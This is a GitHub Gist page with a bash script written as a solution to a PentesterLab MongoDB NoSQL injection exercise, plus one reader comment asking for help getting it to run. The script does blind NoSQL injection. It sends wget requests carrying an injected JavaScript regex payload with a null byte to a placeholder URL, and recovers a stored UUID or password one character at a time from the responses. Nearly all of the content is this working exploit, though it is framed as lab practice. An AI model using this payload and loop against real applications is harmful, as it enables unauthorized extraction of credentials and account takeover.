Last active
June 9, 2020 09:49
-
-
Save r00tpgp/7e510f51381996128c86b4b5a77ec58d to your computer and use it in GitHub Desktop.
mongodb noSQL injection Exercise 02 @ Pentesterlab.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This script was written to do blind nosql injection to enumerate the UUID | |
| # Written by r00tpgp | |
| # 10 Dec 2018 | |
| # | |
| charset=("a" "b" "c" "d" "e" "f" "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "-") | |
| uri="http://xxxxxxxxx" | |
| d=0 | |
| for ((j=0;j<=36;j+=1)) | |
| do | |
| for i in ${charset[@]} | |
| do | |
| printf "Trying... $i @ position $j \n" | |
| out=`wget -qO- $uri/?search=admin\'%20%26%26%20this.password.match\(/^.{$j}$i/\)%00 | grep "?search="` | |
| if [[ "$out" =~ "<tr><td><a href=\"?search=" ]] | |
| then | |
| printf "Found UUID char: $i \n" | |
| pass+=$i | |
| break | |
| fi | |
| done | |
| done | |
| printf "UUID is: $pass \n" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hi man can you check this again as even after i added the website its not running for more than 10 seconds without outcome.
please help im trying to get the UUID for 2 days with no luck